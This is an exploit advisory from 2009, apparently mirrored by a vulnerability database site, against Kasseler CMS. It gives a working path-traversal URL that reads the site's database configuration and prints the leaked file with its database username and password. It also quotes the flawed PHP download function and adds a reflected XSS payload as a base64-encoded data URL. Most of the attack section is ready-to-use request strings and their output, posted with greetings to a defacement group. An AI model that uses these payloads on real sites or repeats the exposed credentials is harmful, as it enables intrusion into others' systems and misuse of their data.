Lucene search
+L

Kasseler CMS - File Disclosure / Cross-Site Scripting

🗓️ 22 Jun 2009 00:00:00Reported by S(r1ptType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

Kasseler CMS file disclosure and cross-site scripting vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2228
22 Jun 200900:00
circl
circl
Circl
CVE-2009-2229
22 Jun 200900:00
circl
cve
CVE
CVE-2009-2228
26 Jun 200918:00
cve
cve
CVE
CVE-2009-2229
26 Jun 200918:00
cve
cvelist
Cvelist
CVE-2009-2228
26 Jun 200918:00
cvelist
cvelist
Cvelist
CVE-2009-2229
26 Jun 200918:00
cvelist
euvd
EUVD
EUVD-2009-2224
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-2225
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-2228
26 Jun 200918:30
nvd
nvd
NVD
CVE-2009-2229
26 Jun 200918:30
nvd
Rows per page
#X      X
# X    X       A      K  KK  NN    N  EEEEEE  TTTTTTTT
#  X  X       A A     K K    N N   N  E          TT
#   XX       AAAAA    KK     N  N  N  EEE        TT
#  X  X     A     A   K K    N   N N  E          TT
# X    X   A       A  K  KK  N    NN  EEEEEE     TT
#X      X

Author: S(r1pt - xaknet.ru
GreetZ to all users xaknet.ru, especial: baltazar, Saint, X1mer@, Trash, Ic3, G1yuk, NEXGEN, ErrNick, deface and other ..

###
Kasseler-Cms (Reafile/XSS) Multiple Remote Vulnerabilities
Site author: kasseler-cms.net
###

Readfile:
http://www.kasseler-cms.net/engine.php?do=download&file=../includes/config/configdb.php :
<?php
/**********************************************/
/* Kasseler CMS: Content Management System    */
/**********************************************/
/*                                            */
/* Copyright (c)2007-2009 by Igor Ognichenko  */
/* http://www.kasseler-cms.net/               */
/*                                            */
/**********************************************/

if (!defined('FUNC_FILE')) die('Access is limited');

$database = array(
    'host'                => 'localhost',
    'user'                => 'kasseler_robin',
    'password'            => 'cs010488oia',
    'name'                => 'kasseler_cms',
    'prefix'              => 'kasseler',
    'type'                => 'mysql',
    'charset'             => 'cp1251',
    'cache'               => '',
    'sql_cache_clear'     => 'INSERT,UPDATE,DELETE',
    'no_cache_tables'     => 'sessions'
);
?>

vulnerability in engine.php:
function download(){
global $config;
    require_once "includes/class/download.php";
    $file = "uploads/".$_GET['file']; #here =)
    $download = new file_download($file, 0, 1024);
    $download->download();
}

AND XSS bonus:
http://www.kasseler-cms.net/engine.php?do=redirect&url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnRmluZWQgYnkgUyhyMXB0LCDQsNCz0LAuJyk7PC9zY3JpcHQ+

# milw0rm.com [2009-06-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03531
48